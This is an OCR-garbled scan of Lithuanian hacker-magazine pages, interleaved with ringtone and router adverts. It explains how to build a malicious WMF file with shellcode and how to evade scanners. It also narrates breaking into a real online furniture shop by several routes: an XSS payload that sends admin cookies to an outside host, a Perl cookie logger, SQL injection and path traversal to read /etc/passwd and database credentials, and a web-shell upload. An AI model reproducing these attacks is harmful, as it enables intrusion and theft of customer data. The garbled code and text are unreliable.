DWORD FileSiza; // pilnas metabylos dydis žodžiais 
WORD NumOlObjecs; //obieklų skaičius bylojo 
DWORD MaxRecordSize; // maksimalus įrašo dydis žodžiais 
WORD NumOlParams; // nenaudojamas (— = 0) 

3 WINFKEAD; 


Kiekvieno įrašo struktūra tokia: 


WMF: how it works 


Ž 
Nu | 
mu 


taip kirminas atakuoja pežeigžiamą sistemą. 


WMF: how it works: unofficial patch 


Tirane as, 


neoficialus hotfix sutvarko visus žinomus kirminus, kurie laužiasi | META ESCAPE 


TOP ŽAIDIMAI | VOKALINĖS MELODIJOS || | VOKALINĖS MELODIJOS || 


Kodas: 220329660 | „Kodas: 217829660 Kodas: 165509660 James Brown: | Feel Good 120239660) 
Deies A Gabbana 230549680 
Jurga: Nebijok 164868680 
A MamanievassG, ai A78878680 
TeiežiPapiepėkin 1s7630469 
Crazy Frog: Anei F 1es220560 
malmgaine o akiraninkjiois Elen anas inas Elktos katės Nlykamas 15249460 
EM r S Zvonos prata; Koroshe, tem takaya 18s110460 


Ginkių arsenas dynėspojių |Iš penkių nari kovok prieš Bo 


TT . NY ks AE I Įstikinkie, kad telefone įjungta Ir veikia GPRS paslauga. 
Nusiųskite žinutę su vokainės melcdijos koi | numerį 


NAUJI ŽAIDIMAI SSS55LRRRRRISRRL aaa 
Kodas 285962 
TT E 
Andrius: Nes vyra ITe279840  1782790800 
Yva Pabusiuox 229099000  223090600p. 
Madonna: Sorry 20sii8880 | 20511aas0p 
Daz Sampson: Teenage Lile 226au06s0 |725810660p 
Aventura: Cuando Volveras Mtaso66o | 11350660p 
Shakira: Lt Tortura 16s108680 | 165'04660p 
Nuro Gauja pas Ja Vida sri ausi i Orgnaus žalias aga mua, | SKAMP: Lattento 230729990 230729090p 
ma Pukgeta i Ale retro paši Sanakiiolika Umanės Ekipa Teke Mota: Dureh Den Mansin In4069650 194069660p 
ir raini I una R aga tan maži, | Pa 69 Danguje: 9 Danai M10628660  210629660p 
ių MR USS; Come Bazk To Me Baby 21s719060 | M5740060p 
18 K. Bumeris 2 Zienigos0 | MSSB60p 
Lerai: Hard Rock Maleiujah 225828060 226829060p 
Angelina: Negalvok 2ž3149040 A23100605 
skin, kd junga I vika GPRS paslauga, Žnutę su žaidimo kodu nusisieįnumerį Adamaų šeimynėlė T0raes0 | 70168605 
Živinas Žvagulis: Faina 1s12796s0 | I81278060p 
SPALVOTI ATVIRUKAI Iš serlalo "Brigada" 34149660  34149660p 
TAR Rasa ir Jonas: Teka saulė 230859660 230669860p, 
RK IIa „Maris Poteris“ Iaarieoeo | 140710000p 
LET < Andris: G kan sera aosor0880 207988 
Taa7tasso TA7205660 TOS120650 T67428660 —ŽA8319660 | ane NS KOTA 
E Sean Paul; Temperature 221509660  221599660p 
LT United: We Are The Winners 2is008660  219009669p 
K žioaasoo žem 22eDassoo Žareašeos | 212318000 22 2ooz0e60. | The Rasmesi Sali Away 120709000 225709090p 
ra T HI Tokio Hotel: Rette Mich 217359860 | M7350680p 
"asswmeso“ 2aaiesamo Zauūmeo oseNoreO adla: Kaip dė keri du IPsos8910 ,TESiNSeNĘ 
Black Eyed Peas; Gone Gelng A27479060 227470069p 
IS KL „Krkėtatovis Iz1rowowo | I217a0060p 
Antanas: Sudeginti Ultai AOs170560 | 10179680p 
Živinas Žvagulis: Itališka dainelė 145009660 | 145000689p 
3 Bansuna Ca ož G ias i Ga XS) AA Mai AGD Aaa, | Raketa: Pedarys mane 210659660 210858660p 
Lua Starlight: | Don't Know 127819660) 227510681p 


Mokinukės: Bye Bye 122108660 | 122109669 
ATVIRUKAI LOGOTIPA a B 
Vilija: SpJaudau Ir gaudau 76840640 I 176640660p 


k [apa HACKER Nžiiu BZSS 95 
TĄ KiLeR Persia! R EPT 4 

22s058660 220779660 | 216239660 o TTT MS 

4EOGENES 2o7179660 IS les660 Ese60 eko pu sis kons Penk painios || 

Ty DU Ok BODBOOI "Žau Palknio eik Upės" EB Kiaupa 

„B PEPSIS NGFEAR (Ši iiai ui == 

Žiataseso“||108418680 Sa ana PEDN a oo IP EBRSSKOSI T 
EE V UAI KOKIA HEpilep PLAYER 

ai Ur kI I IIALS TT 
žaasisoso | 2iesos66 2 Š sikincis Tad etoro nota veikia GPRS Pasiaipa 

Šš Manė vida! AŽF 54 DRIGANA TS 3EB0680p) sųskio | mūsų numet 


P RE r sE5s 
220839680 142229660 -- TŽ 
VALYMO PRIEMONĖ ganosi 
44 
Vj i S TELEFONO EKRANUI! 
214'39660 21269680 Ti6559660 Nusiųsk kodą 63009660 | numerį - 
PLA Tu gausi TUŠČIĄ LOGOTIPĄ | Žinut su kotu siuskis | numerį ž 
* i V Dėmesio! Tik NOKIA ileanams | Sakai ono i a eat 


Evišiai 
aa D po pa 


aktai S 0 EE ESI A ai O 


Eika, 


E 0 7970 ban) ae SAMSUNG (sy 


Ša Kr 
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Įrašo struktūra 
typedel stiuct 
( 

DWORD Size; // pilnos įrašo dydis žodžiais 
WORD Funcion; // funkcijos numeris įr parametrų kiekis 
WORD Parameteis[]; // perduodamų parametrų reikšmės. 
WMFRECORO, 


SlondordMetoRecord 


[Disasembliuojam eksploitą] Paskutinis įrašas visada yra 
0003h 0000h 0000h (antraštės dydis — 03h žodžiai, funkcija 
— NULL, parametrų nėra), kas interpretuojama kaip „metabylos 
pabaiga“. 

Dabar pradėkime disasembliuoti exploit.wmf. Pradžioje randame 
standartinę WMF antraštę, kurios daugelis laukų ignoruojami ir 
gali turėti bet kokias reikšmes. Svarbiausia, kad FileType == 
1, Headersize == 9, Version == 100h arba 300h, o Filesize 
saugotų tikrą bylos dydį, nes priešingu atveju IrfanView ir kitos 
grafinės programos nesugebės tokios bylos atidaryti. Šią savybę 
galima panaudoti polimorfinių kirminų ir kitų gyvių kūrimui. Tarp 
kitko, funkcija PlayMetaFile suteikia daug laisvės, kadangi ne- 
tikrina laukų FileType ir FileSize. 

Prie antraštės glaudžiasi pirmasis įrašas, kuriame yra funkcijos 
META ESCAPE (626h) iškvietimas su subfunkcija SETABORT- 
PROC (0009h), kuriai perduodami du parametrai: įrenginio 
konteksto deskriptorius (šiuo atveju jis lygus 16h, tačiau gali 
būti bet koks) ir mašininis kodas, kuriam bus perduotas valdy- 
mas, t.y. shellkodas. Visų dokumentuotų funkcijų kodai aprašyti 
byloje WINGDI.H (žr. „/* Metafile Functions */*), ten pat galima 
rasti ir Escape sekas. 

GDI32.DLL disasembliavimas rodo, kad Windows nuskaito tik 
jaunesnįjį funkcijos baitą (Escape atveju tai 26h), o vyresniame 
perduoda parametrų kiekį, kurio niekas netikrina! Taigi norint 
atpažinti kenksminga WMF bylą, reikia išanalizuoti visus įrašus, 
kuriuose reikia ieškoti funkcijos 26h ir subfunkcijos 9h. 

Vieno įrašo dydis nebūtinai turi atitikti realybę, o taip pat visiškai 
nebūtina įterpti užbaigiantį įrašą, kaip kad to reikalauja WMF 
specifikacija, nes kai shellkodas gauna valdymą, visos speci- 
fikacijos eina šuniui ant uodegos. 

Kalbant apie patį shellkodą, tai jis visiškai standartiškas. 
Ilfakas per PEB (Process Environment Block) nustato bazinį 
KERNEL32.DLL adresą (kas neveikia 9x sistemose), išnarsto 
eksporto lentelę, suranda API funkcijos LoadLibraryA adresą, 
užkrauna USER32.DLL ir per MessageBoxA išveda „keiksmą“. 
Kad shellkodas veiktų, 9x sistemoje reikia perrašyti funkciją 
GetKrn!32addr, po ko ši turėtų išmokti tiesiog atmintyje surasti 
KERNEL32.DLL. 

Dabar aptarkime kitą eksploitą, kuris būtų sudėtingesnis. Tegu 
tai bus Metasploit Framework (jį galima parsisiųsti iš www. 
metasploit.com arba pasiimti iš mūsų disko). Tai polimorfinis 
pilnai su Per! parašytas eksploitas, kuris kintamajame PayLoad 
gali turėti bet kokį kovinį įdarą. 

WMF bylos generavimas vyksta taip pat, kaip ir praėjusį kartą, 
tik dabar nekritiniai laukai parenkami atsitiktinai, o pats shel- 
Ikodas įterpiamas į laisvai pasirinktą vietą tarp „šiukšlinių“ įrašų, 
kas apakina primityvius skenerius ir ugniasienes. 26h 7? 09h 
0O0h seka išlieka pastovi, tačiau ji per daug trumpa, kad ją būtų 
galima aptikti, o rankiniu būdu perrinkinėti visus įrašus gali tik 
specialiai tam sukurtas skeneris. 


Mažytis niuansas: pas Ilfaką shellkodas patalpintas už DCh 
žodžio, o Metasploit'e jis seka iš karto po subfunkcijos SETABO- 
RTPROC (bent jau taip atrodo prabėgom išanalizavus listingą). 
Kintamasis $shellcode susideda iš dviejų dalių: fiktyvaus lauko 
Space ir žemiau esančio kovinio įdaro. 

Norint parašyti savo eksploitą, reikia sugeneruoti WMF antraštę, 
įterpti META ESCAPE/SETABORTPROC įrašą ir prikabinti 
shellkodą. WMF checker'io išeities tekstuose yra byla wmfhdr. 
wmf, kurioje jau yra antraštė ir paruoštas įrašas. Čia trūksta tik 
kovinio įdaro, tačiau tai lengva ištaisyti su komanda „copy /b 
wmfhdr.wmf + Shell-code.bin exploit.wmf“ „kur Shell-code.bin 
— bet koks ištrauktas iš kirmino arba savarankiškai sukurtas 
shellkodas. 


[Kaip apsisaugoti] Prieš pradedant saugotis būtų gerai 
išsiaiškinti, ar tavo sistema pažeidžiama? Be abejo, galima pasi- 
naudoti Ilfako WMF checker'iu, tačiau jis veikia tik NT sistemose. 
Pabandykime jį papildyti: imame wmfhdr.wmF, papildome jį CCh 
ir sušeriam skirtingoms grafinėms programoms. Jeigu sistema 
pažeidžiama, tai ekrane pasirodys kritinės klaidos pranešimas, 
0 ElP rodys į INT O3h. Tai r ia, kad kirminas tave gali užpulti 
bet kurią sekundę ir užkrėsti, jeigu, aišku, to dar nepadarė. 
Oficialų „Microsoft“ pataisymą gali rasti adresu: www.microsoft. 
com/technet/security/Bulletin/įms06-001.mspx bei mūsų diske. 
Kaip visada, tai riebi (mažiausiai pusė megabaito) byla, kuri daro 
neaišku ką ir neaišku kodėl. 

Naujų pataisymų įdiegimą dažnai lydi problemos, kurios Išlenda 
visiškai netikėtose vietose. Ka daryti? Ogi štai ką. Dabar mes 
su tavimi pažiūrėsime, kas yra šio pataisymo viduje. 

Visų pirma, iš disko pasiimk pataisymą (Windows2000- 
KB912919-x86-ENU.EXE), paleisk hiew ir šioje byloje surask 
signatūrą MSCF. Ji čia turėtų būti mažiausiai dviejose vietose. 
Pirmą kartą — vykdomoje įdiegėjo byloje (poslinkis 01006022h), 
antrą — cab archyvo pradžioje (01006888h), prieš kurią pa- 
prastai eina ilga DINGPADDINGXXPAD grandinė, palikta norint 
išlyginti, o toliau — netvarkingai išmėtyti bylų pavadinimai. 
Užvedame kursorių prie MSCF, spaudžiam <*>, tada 
<Ctrl> + <End>. Nuspaudžiam <*> dar kartą ir su <F2> 
kopijuojame išskirto bloko turinį į bylą (pavadink ją bet kaip, 
pavyzdžiui, archyvas.cab). Ištrauktą cab archyvą galima lengvai 
išpakuoti su bet kokia populiaria archyvavimo programa. Jame 
esminės bylos yra šios: 

* GDI32.DLL. Ši biblioteka buvo atnaujinta: pasikeitė data ir 
dydis, beje, dydis sumažėjo, kas „Microsoft“ nėra būdinga. 
Sprendžiant pagal laiką, biblioteka buvo sukompiliuota 2005 
metų gruodžio 29 dieną, 13:17:07, o paskutiniai pakeitimai 
atlikti 2005.12.30/08:16, kas byloja apie tai, kad programuo- 
tojai sureagavo operatyviai, o visą likusį laiką užėmė testavimas 
arba iš viso neaišku kas. 

* MF3216.DLL. Ši byla nebuvo pakeista. 

* SPMSG.DLL. Resursas su tekstiniais pranešimais. 


Taigi šiame atnaujinime nėra nieko baisaus, todėl tu zali be 
baimės jį pas save įdiegti :). Nors aš apsiriboju Ilfako atnau- 
Jinimu. 


[Beje, apie Ilfaką] Ilfaku aš tikiu labiau, nei savimi. Jo pro- 
gramavimo patirtis milžiniška, be to, prie pataisymo pridedami 
išeities tekstai (http://castlecops.com/downloads- file 499 de: 


tails-WMF hotfix source code.html), Iš kurių aišku, kaip jis vei- 
kia. Jau sukompiliuotą bylą galima gauti iš čia: http://castlecops. 
com/downloads-file-496-details-Ilfaks Temporary WMF 
Patch.html. Įdiegėjas mažytę (vos 3 Kb) biblioteką wmfhotfix.dll 
nukopijuoja į sisteminį Windows katalogą ir modifikuoja sisteminio 
registro šaką HKLM|Sofiware|Microsoft|Windows NT|CurrentVer- 
sion|Windows|Aoplnit DLLs, taip suprojektuodamas šią DLL į visus 
USER32.DLL užkraunančius procesus. 

Išten (iš D/IMain) jis užkrauna GDI32.DLL, nustato Escape funkcijos 
adresą ir, su VirtualProtect iškvietimu iš anksto priskyręs reikiamus 
atributus, į jos pradžią įrašo mažytį thunk, kuris analizuoja argu- 
mentus, ir jeigu func == SETABORTPROC, tai grąžina Xor eax, 
eax/pop ebp/rein 14h. 

Kai kurios antivirusinės programos ir apsaugos sistemos (pavyzdžiui, 
Lavasoft's Ad-Watch) neleidžia programoms modifikuoti Applnit 
DLLs šakos bei automatiškai atstato jos turinį. Šiuo atveju Ilfako 
pataisymas nesuveiks — prieš tai reikėtų rankiniu būdu nuraminti 
isislautėjusi „sargą“. Beje, norint laikinai atjungti šį pateisymą, 
pakanka pervadinti wmfhotfix.dll. 


[Pabaiga] Surasta klaida eilinį kartą patvirtina liūdną teiginį: „Mi- 
crosoft“ gaminama programinė įranga katastrofiškai nepatikima ir 
skylėta kaip rėtis. Kritiškai svarbiose vietose geriau naudoti alter- 
natyvias operacines sistemas, pavyzdžiui, BSD arba... Windows 
98. Labai įdomu, tačiau dabar atakuoti 9x kur kas sudėtingiau, 
nei NT, todėl joje kirminai praktiškai neplinta. 


[GDI32.DLL viduje] GDI32.DLL disasembliavimą 
geriausia pradėti nuo funkcijų PlayMetaFileRecord/ 
PlayEnhMetaFileRecord. Funkcija PlayMetaFil- 
eRecord veikia kaip didelis switch, kurio case 
šakose įkurdintos iškviečiamos GDI funkcijos, o 
PlayEnhMetaFileRecord naudoja lentelinį iškvietimo 


metodą: 

Disasembliuotas  PlayEnhMetafileRacord fragmentas iš GDI32.0LL 
W2KSP4 

Aex:77F70C87 mov eh [ehp+0g 


ox:77F70CBA push esi 
Aed77T0GB push di 
AedTTJOGC more [ol 
„text:77F70CBE cmp ex 1 


Aoxi:77F70CC) [i short loc 77F70CDF 
Aex:77F70CC3 m eur, TA 
Aex:77F70CC6 jų short lot 77F7000F 
Aet77POC Jeby+-0g; 10) 
Aon:77F70CCB mo 00, eb 
Aod7TTOCO push Įebpag, B] 
Aet77E000 push lebp+og A] 
Aek:TTATOOS call oi 77F862Cenx'4] 


Nuosekliai perrinkinėdami vieną funkciją po kitos, 
žiūrime, ar jos vietoje vieno iš savo argumentų ne- 
priima callback'ų (šią informaciją galima gauti ir iš 
SDK), o jeigu priima, tai ar leidžia perduoti rodyklę 
WMF bylos viduje. Įtariu, kad tai ne paskutinė GDI 
skylė :) 


SMC 


Networks 


SAVA ERDVĖ 
PASAULINIS PASIEKIAMUMAS 


KAS TU! 


Bevielė laisvė. Jokių rūpesčių. 
Reikia bevielio interneto teikiamos 
laisvės, bet nesinori rūpesčių? 


Pasirink SMC ir viskas bus taip kaip nori. 


Pirmas žingsnis BarricadeTM 

plačiajuostės radijo signalų sistemos 2 
maršrutizatoriaus Cable/DSL. Tai saugu: 
patikima ugniasienė, pažangus šifravimas | 
ir galimybė blokuoti nepageidaujamas 
programas. 

Papildomos galimybės: keturių prievadų 
komutatorius. Jis greitas: 54 Mbps per 

802, Ig įrenginiai visiškai suderinami su 
802,1 Ib. 


platus, Cardbus nešiojamam kompiute- 
riui, PCI kortelę staliniam arba USB 
abiems. 


Itin patogi ir „draugiška“ EZ programinė 
įranga suteiks jums saugumą ir belaidį 
ryšį per kelias sekundes. 


WIRELESS | BROADBAND | SWITCHES | HOME ENTERTAINMENT 
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Laužiam populiarų i — pagalvojau aš. Na, gerai, susidomėjęs ir aš į jį užmesiu 
elektroninės prekybos varikliuką jo 
TAI, KAD ELEKTRONINĖSE PARDUOTUVĖSE [Pradėsim] Parsisiuntęs ir įdiegęs e-shop'ą į savo diską, aš 

5 MAŽAI SKYLIŲ, NĖRA TUŠTI ŽODŽIAI, ėmiausi tyrinėjimų. Šis varikliukas vadinosi paprastai — Shop: 

fe] BUGTRAO“ E ĮVEDĘS ŽODĮ SHOP“, AŠ Script 2.0. Kaip ir priklauso visiems šiuolaikiniams varikliukams, 

Žž i informacijos saugojimui buvo naudojamas duomenų bazių serveris. 

S PAMAČIAU TIK KELETĄ 2000 METŲ po pirmosios „paciento“ apžiūros iš karto buvo aptikta keletas 
NUORODŲ, PORĄ PASYWIŲ XSS'Ų IR klaidų. Praktiškai niekur nebuvo tikrinama, ar kintamuosiuose nėra 
2001 METAIS IŠPUBLIKUOTĄ UŽUOMINĄ Specialiųjų SEO aE2 ponkių Ia tekstų Yrinėjmo minučių 

man net pasirodė, kad šio varikliuko kūrėjai iš viso nieko nežinojo 

APIE SOL INJEKCIJĄ. MANE TAI SMAR- Gia vei apikacjų saugimą ). Man gasrodė ikrai komiška 
KIAI NUSTEBINO IR AŠ NUSPRENDŽIAU kad elektroninės prekybos varikliuką kuriantys programuotojai nė 
IŠTAISYTI ŠIĄ SITUACIJĄ. MAN NET nesusimąsto apie savo programos saugumą. Nors galoūt yra taip, 

o PASIDARĖ ĮDOMU SURASTI SKYLĘ KOK|- kad jie tai darė specialiai? Kad ir kaip ten bebūtų, mums tai tik į 

ž naudą. Pastudijuokime klaidas. 

= AME NORS NEMOKAMAME PARDUOTUVĖS š 

o VARIKLIUKE. [Pirmoji klaida — XSS] Jeigu užsakymo apiforminime į bet kurį 
[Apie viską iš eilės] Viskas prasidėjo nuo to, kad aš asmeninės informacijos (telefonas, adresas ir t.t.) lauką įterpiume 
per fip prisijungiau prie serverio, kuriame buvo hosti- RUTĘ 
nama mano svetainė. Tarp keleto katalogų mano dėmesį š 
patraukė vienas, kuris vadinosi Shop ir kurio aš prieš tai [Velykinis RST kiaušinis] * 
nė karto nebuvau matęs, Jame buvo saugoma daugypė | Ne tiek jau daug žmonių Siuo vea au Aomenaos RST, 
įvairiausių skriptų. Atidaręs šį katalogą su naršykle, aš ga- | ŠUkUMtame megapopuliariame web shelle yra „velykinis 

O Iutinai įsitikinau, jog tai internetinė parduotuvė. Pasirodo, | Kiaušinis“ — apsilankymų skaitliukas, kuris statistikoje 

5 mano draugas ir antras mūsų svetainės administratorius | PaTOdo įdiegto shello adresą (Referrer SL Rersiiųsi 

— nusprendė ištestuoti šį varikliuką. „Suknistas komersan Skriptą su iškirptu sialtilukų galima Iš čia: 


script >0lert() = Acipt > 


Tai atvaizduojant šią informaciją bus pateiktas perspėjimas 
(alert()). 

Idomu, ar šis kodas bus vykdomas administratoriaus skydelyje? 
Peržiūrint vartotojo informacija neatsidarė jokie papildomi lan- 
gai — kodas nebuvo vykdomas. Tačiau pakanka tokiam piktam 
vartotojui užsisakyti prekę, o administratoriui peržiūrėti naujus 
užsakymus, kaip kenksmingas kodas bus įvykdytas ir mūsų 
atveju pasirodys langas su perspėjimu. Parašyti administrato- 
riaus sausainukus (cookies) išsiunčianų skriptą — techninis 
dalykas ir jau senai pracitas etapas, tiesa? 

Pavyzdinis xss kodas būtų maždaug toks: 


script > document.wrile(" <img width=1  height=1  src= "http://nifl.ru/piciure. 
ing?" + document. cookie +" >); < Aciint> 


Norint sėkmingai atakuoti, į savo serverį reikia persiųsti maždaug 
tokį perl skriptą: 


Pažangaus perl snilerio kodas 

4 Vusi/bin/per! 

StogFile="log.xt"; 46 kolos iki log. bylos 

Smlengih=50; 4 maksimalus įrašų: skaičius 

print “Location: image.giNaNN“; 7 padarom nukreipimą (redirec) į pavaiksliuką 
tecd(STDIN, Sinput, SENV4 CONTENT LENGTK“)); 4 nuskaitome užklausos: duomenis 


Sirput = SENVĮ/OUERY STRING') if SENV(ŪUERY STRING'); 
Sinput = — s/Ya(|o-H-F0-3][a-H-F0-9])/pack(“C", hex(S1))/eg; 
Snow string = localtime; 7 gauname užklausos laiką ir HTTP REFERER 


Set = SENVŲITP REFERER |; 

+ nuskaitome logą į musyvą 

open ((06,'Slogfile") ||| die "Cart open SlagFile: SN", 

DU0Goxi— <L06—; 

de (06); 

open (LOG, “> SlogFile"); > atidarome loga: įrašymui 

> išsiugojame užklausos duomenis 

print LOG “[Šnaw string] IP-- SENV('REMOTE ADR“) REFERER=Sret OUERY= ŠinpuiN 
1; 

2£ likusius logus išsaugojame taip, kad logo bylos ilgis neviršytų mlength 

Šcauntėi = I; 

foreach SLOGitem ((GDLOGred) 


1 

i (Šcounter< Smlongth)( print LOG “SLOGitem"; |; 
Scounter + +; 

dose (L06); + uždarome logą 

oil; 


Pateiktas skriptas leidžia sekti IP adresą, Referrer lauką ir gauti 
skriptui perduotus laisvai pasirinktus duomenis. Skriptas varto- 
tojui grąžina paveiksliuką, nugvelbia jo sausainukus ir nesukelia 
įtarimų. 


[Antroji klaida] Įdarbinus paieškos sistemą (net nesakysiu kokią), 
buvo pasirinkta su Shop-Script veikianti svetainė. Savaime supran- 
tama, prieš tai aš nepamiršau apie savo anonimiškumą. 
Svetainėje prekiavo kažkokiais baldais, nors man tai buvo visiškai 
nesvarbu :). Mano tikslas buvo vienas — gauti priėjimą prie ad- 
ministravimo arba duomenų bazės. 


Neturėdamas pakankamų žinių apie 
sąl-injection, aš vis dėlto bandžiau 
išgauti informaciją iš DB. Taip aš at- 
likau keletą eksperimentų, vienas kurių 
atrodo taip: 


Internete jau gana 
lai galima gauti 
žymaus elektron. 
io aukciono eBay 
išeltiės tekstus, 
Jelgts tu rori pasi 
jausti imu Nlaldų 
eškoloju. paleškos 
sistema padės 
tau surasti šiios 


hitip://mebelori.anvindec php?categorylD — 668 +-u 
nion + seleci + null nul,nulinul| null null ul, ull 
Ull,null,null,null nul,ul/" 
tačiau stulpelių kiekis nesutapo (norint 
parinkti išrenkamų laukų skaičių, reikėjo pasinaudoti skriptu arba 
padaryti tai rankiniu būdu — red.past.). 
Kitaip tariant, aš negavau reikiamo efekto. Tuomet nusprendžiau 
įvisą šį reikalą įtraukti savo pažįstamą, kuris neblogai gaudosi są! 
injekcijoje. Jis buvo pernelyg plepus ir mestelėjo keletą idėjų: 


kom kodus) 


http://mebelari.com/index.php?cotegorylD=-19420uniont620selec0670lond Ile(//etv 
passvd')0420trom'o20admin/" 


htp:/mebelart.canVindax.php?cotegorylD= -19620union?620selec1?620password?20from 
*620admin/" 


Tačiau įgyvfendinti jo pasiūlymą man taip pat nepavyko, todėl aš 
nusprendžiau ataką atidėti kitai dienai. 


[Nauji sprendimai] Tiesą sakant, aš visai nenorėjau administra- 
toriaus sausainukus gaudyti su CSS. O išgauti duomenų iš bazės 
taip pat niekaip nepavyko. Atrodė, kad išeities nėra ir kad teks 
tenkintis tik pažeidžiamumų egzistavimo faktu. Tačiau tuomet aš 
pagalvojau, kad jeigu sistemoje yra dvi klasikinės klaidos, kodėl 
gi nepabandžius atrasti ir trečios? :) Ir iš tiesų, intuicija manęs 
nenuvylė. index.php skriptas turi parametrą aux page, būtent jis 
galėjo skaityti serverio bylas. 

Neilgai galvojęs, nusprendžiau peržiūrėti sisteminių vartotojų var- 
dus. Pakišęs serveriui aux page=../..J..J..J..J..J..Jete/passwd, aš 
pamačiau visus sisteminius vartotojus. 

Peržiūrėjęs parduotuvės varikliuko kodą, suradau įdomią bylą 
connect.inc.php, kuri buvo kataloge cfg. Šioje byloje buvo saugo- 
jama visa prisijungimo prie DB informacija, t.y. serveris, vartotojo 
vardas, slaptažodis ir parduotuvės administratoriaus vartotojo 
vardas. Taigi aš serveriui sušėriau parametrą aux page, vietoje 
kurio reikšmės buvo ../cfg/connect.inc.php — skriptas man parodė 
tuščią puslapį, tačiau peržiūrėjęs jo išeities tekstą (source) aš 
pasiekiau pageidaujamą rezultata: ten aš radau prisijungimo prie 
DB duomenis. Tada aš į anksčiau nulaužtą serverį persiunčiau 
RST komandos sukurtą skriptą sąl.php (šiuo tikslu taip pat tiks ir 
programa SOLog) ir prisijungiau prie duomenų bazės. 

Dabar DB mano rankose. Toliau — dar gražiau. Greitai perėjęs per 
lenteles, aš radau dar vienos užduoties sprendimą. Pasirodo, skrip- 
tas administratoriaus vartotojo vardą ir slaptažodį saugo lentelėje 
ss customers, kas daroma be jokio šifravimo, atviru tekstu. Įvedęs 
šiuos duomenis pagrindiniame svetainės puslapyje, aš pakliuvau į 
administravimo zoną. Štai ir viskas. Užduotis įvykdyta. 


[Tai dar ne pabaiga] Prieš mane puikavosi administravimo pusla- 
pis. Mačiau du naujus užsakymus. 

Aš pagalvojau, jog būtų galima pakeisti kokios nors sofutės 
kainą į kur kas mažesnę ir užsisakyti ją sau su pristatymu į na- 
mus. Tačiau kadangi baldų pas mane ir taip užteko, o papildyti 
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artimiausią kalėjimą taip pat nesinorėjo, 
aš nesiėmiau šių karštligiškų kliedesių 
realizacijos :). Po to aš pagalvojau 
apie naivių klientų kreditinių kortelių 
duomenis, tačiau panašaus pobūdžio 
informacijos rasti nepavyko. Čia buvo tik 
adresai, pavardės, telefonai ir t.t. 

Aš turiu pilną priėjimą prie duomenų 
bazės, prie administravimo skydelio, ko 
dar trūksta iki pilnos laimės? Teisingai, shello :). 

Administravimo skydelis pasirodė besąs ganėtinai funkcionalus, 
tačiau jame kažkodėl nebuvo pasirinkimo „Persiųsti shellą“ :). 

Iš pradžių aš pamaniau, kad gauti web shellą šioje mašinoje bus 
paprasčiau nei paprasta, deja, klydau. Visur, kur tik įmanoma, 
įterpinėjau banalią eilutę <?php system(“id"); 2>: iš pradžių 
į naujienų bloką, po to į „Apie parduotuvę“ ir „Pristatymas ir 
apmokėjimas“ puslapius, tačiau niekur nebuvo išvedama man 
reikalinga informacija. 


Ii nemėgink jungtis 
adrosi Www.Largel. 
eomadin pp ka. 
dang tavęs ten ie 
as neleis dimo 
į adninistravimo 
Zoną duomenys 
įvedami pagrinaini 
me puslanyje. 


[Persiunčiam shellą] Tada aš iš inercijos bakstelėjau į „Kategori- 
jos ir prekės“. Ten man buvo siūloma sukurti naują kategoriją. Čia 
mane sudomino punktas „Logotipas“, kurį buvo siūloma užkrauti 
iš kompiuterio. Manau, kad numatyti tolimesnius mano veiksmus 
labai paprasta. Aš įžūliai užkroviau bylą sh.php, kuri buvo šiek tiek 
modifikuotas RST shellas. 

Elektroninės parduotuvės sistemoje nebuvo nė užuominos apie 
bylos praplėtimo ar turinio patikrinimą. Svetainėje aš pasirinkau 
ka tik sukurta kategoriją, užvedžiau pelės kursoriu virš kategorijos 
paveiksliuko, kontekstiniame meniu pasirinkau Open image ir gavau 
pilnavertį web shellą :). 

Servenyje veikė fryškė. Nenorėdamas išsiduoti, persiunčiau į serverį 
kitą shellą ir pašalinau prieš tai parduotuvėje sukurtą kategoriją. 
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vartotojų prisijungimo vartai 


patogus web shellas 
Manau, nė neverta pasakoti apie tai, ką dabar galima padaryti su 
sistema ir kaip ją galima panaudoti savo tikslais, Apie tai jau per 
daug parašyta. 


[The end] Kiek vėliau antram mūsų svetainės adminui aš papasa- 
kojau apie tai, kiek skylių turi Shop--Script, ir šis su dideliu apmaudu 
iš serverio išmetė šį rėtį. 

Dabar supranti, kaip kartais nerimtai kai kurie žmones žiūri 
į elektroninę komerciją. Rimta firma gali sukurti svetainę su 
Shop-Script varikliuku, koks nors hakeris juos nulauš, po ko gali 
būti paviešinta informacija apie parduotuvės klientus, ko rezultate 
firma praras ne tik autoritetą, bet ir nemažus pinigus. 

Internete Shop-- Script varikliukas pakankamai populiarus, o atlikus 
nedidelį su šia sistema veikiančių svetainių auditą paaiškėjo, kad 
8096 jų yra pažeidžiamos. Aš manau, kad internetinės parduotuvės 
turi būti griežtai kuriamos pagal užsakymą. Svetainę vis tiek kas 
nors gali nulaužti, tačiau saugumas bus bent šiek tiek didesnis. 
Naudotis CMS, kurio kodas atviras visam internetui, gali tik 
nedidelės parduotuvės, kuriuose perkama kartą per mėnesį :). 
Tokiu atveju dėl nulaužimo patirti nuostoliai nebus dideli. 
Peržiūrėjęs dar keletą serverių, kuriuos man po užklausos „inurl:in- 
dex.php?aux page=“ pateikė Google, nustebau dvejose svetainėse 
pamatęs DB duomenis, kurie buvo saugomi aukščiau aprašytame 
serveryje. Kažkoks gudrutis su šiuo elektroninės prekybos varikliuku 
buvo paleidęs tris parduotuves ir, savaime suprantama, visos jos 
buvo pažeidžiamos :). 


A PILDYK yn 
4 TELE2. | p PILDYK PIGIAUSIA 


* Užsisakyk PILDYK mobilųjį 
internetą ir 3 mokamas pramogas 
padovanosime! 

“Akcija galioja visą vasarą! 
Daugiau informacijos — tel. 1570 (PILDYK vartotojams), 


tel. 8670 22 222 (kaina kaip skambučio į 
TELE2 tinklą) ir www.golive.lt. 
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Metalinksmybės 


praktiškai 

Praktinis WMF bylų apdorojimo 
pažeidžiamumo panaudojimas 

TU BE JOKIOS ABEJONĖS GIRDĖJAI APIE 
NAUJĄ MEGAPOPULIARIĄ „MICROSOFT“ 
PRODUKTŲ KLAIDĄ, KURI LEIDŽIA DARYTI 
TIKRUS STEBUKLUS. NORI SVETAINĖS 
LANKYTOJUI PERSIŲSTI TROJANĄ? 
NIEKO NĖRA PAPRASTESNIO! REIKIA 
SUORGANIZUOTI CONNBACK PRIĖJIMĄ 
PRIE SHELLO? KAS PER KLAUSIMAI! 
NORI NUGVELBTI SLAPTAZODZIUS IR 
VISA KITA? ELEMENTARU! PAČIAME 
NAUJAMECIO SURMULIO KARŠTYJE 
VIEŠA TAPUSI KLAIDA IR ŠIANDIEN 
GRŪMOJA PIRŠTELIU VISIEMS WINDOWS 
VARTOTOJAMS, KURIE NESIRŪPINA SAVO 
SISTEMOS ATNAUJINIMU. SIANDIEN 
